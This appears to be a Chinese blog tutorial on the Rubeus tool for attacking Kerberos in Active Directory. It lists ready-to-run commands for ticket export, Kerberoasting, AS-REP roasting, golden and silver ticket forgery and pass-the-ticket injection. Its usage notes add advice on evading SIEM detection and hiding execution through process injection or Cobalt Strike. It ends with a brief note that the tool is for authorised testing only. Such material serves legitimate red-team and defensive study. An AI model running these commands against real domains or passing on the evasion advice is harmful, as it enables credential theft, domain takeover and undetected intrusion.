Rubeus使用教程

张开发
2026/4/16 22:51:06 15 分钟阅读

分享文章

Rubeus使用教程
Rubeus 是一款专注于 Kerberos 协议交互与滥用的命令行工具主要用于 Windows 环境下的 Kerberos 票据操作、漏洞利用和凭据提取。它由安全研究员 Will Schroeder 开发是渗透测试和红队评估中针对 Active Directory 环境的重要工具。该工具能够直接与 Kerberos 协议进行交互支持票据请求、导出、注入、续订等操作同时可以利用多种 Kerberos 相关漏洞如黄金票据、白银票据、Kerberoasting 等帮助安全人员评估域环境的安全性是域渗透测试中的核心工具之一。二、工具文件结构文件/目录路径说明/usr/share/windows-resources/rubeusRubeus 工具的主目录Rubeus.exeRubeus 工具的可执行文件为单文件命令行程序包含所有核心功能三、使用教程1. 前提条件运行环境需在 Windows 系统中运行可通过 Wine 在 Linux 中使用但推荐原生 Windows 环境权限要求部分功能需要域用户权限高级操作如票据伪造需要域管理员相关信息环境依赖需在 Active Directory 域环境中使用独立主机环境下功能受限2. 基础使用方法Rubeus 采用命令行参数模式基本语法为Rubeus.exe 命令 [参数]3. 核心功能及示例1获取当前用户的 Kerberos 票据Rubeus.exe tickets /export功能列出当前用户缓存的所有 Kerberos 票据并导出为 .kirbi 文件应用场景获取可用票据用于后续传递或分析2Kerberoasting 攻击针对服务账户# 列出可攻击的服务主体名称(SPN) Rubeus.exe kerberoast /user:目标用户名 # 导出所有可攻击的服务票据哈希 Rubeus.exe kerberoast /outputfile:hashes.txt功能请求服务票据并提取其哈希值可用于离线破解服务账户密码注意此操作不需要管理员权限普通域用户即可执行3黄金票据生成与注入Rubeus.exe golden /user:伪造的用户名 /domain:域名称 /sid:域SID /krbtgt:krbtgt账户哈希 /ptt参数说明/user要伪造的用户名/domain目标域名称如 example.com/sid域的 SID可通过whoami /user获取/krbtgt域中 krbtgt 账户的 NTLM 哈希/ptt将生成的票据注入当前会话功能生成黄金票据并注入获得域内任意资源访问权限4白银票据生成Rubeus.exe silver /user:目标用户 /domain:域名称 /sid:域SID /target:目标服务主机 /service:服务类型 /rc4:服务账户哈希 /ptt功能生成针对特定服务的白银票据相比黄金票据更隐蔽仅需目标服务账户哈希5票据传递Pass-the-Ticket# 注入已导出的票据 Rubeus.exe ptt /ticket:票据文件.kirbi # 列出当前注入的票据 Rubeus.exe klist功能将获取到的票据注入当前会话实现无需密码访问目标资源6AS-REP Roasting 攻击# 查找不需要预认证的用户 Rubeus.exe asreproast /user:目标用户 /outputfile:asrep_hashes.txt功能针对未启用预认证的用户获取其 AS-REP 响应并提取哈希进行破解4. 使用注意事项检测规避避免在短时间内执行大量操作可能触发 SIEM 告警可使用/nowrap参数去除输出中的换行符便于日志规避结合进程注入技术如通过 Cobalt Strike 加载减少直接执行痕迹版本更新Rubeus 持续更新以支持新的 Kerberos 特性和漏洞建议使用最新版本可通过官方仓库获取更新https://github.com/GhostPack/Rubeus法律合规仅在合法授权的渗透测试中使用未经授权的域环境测试可能违反法律法规

更多文章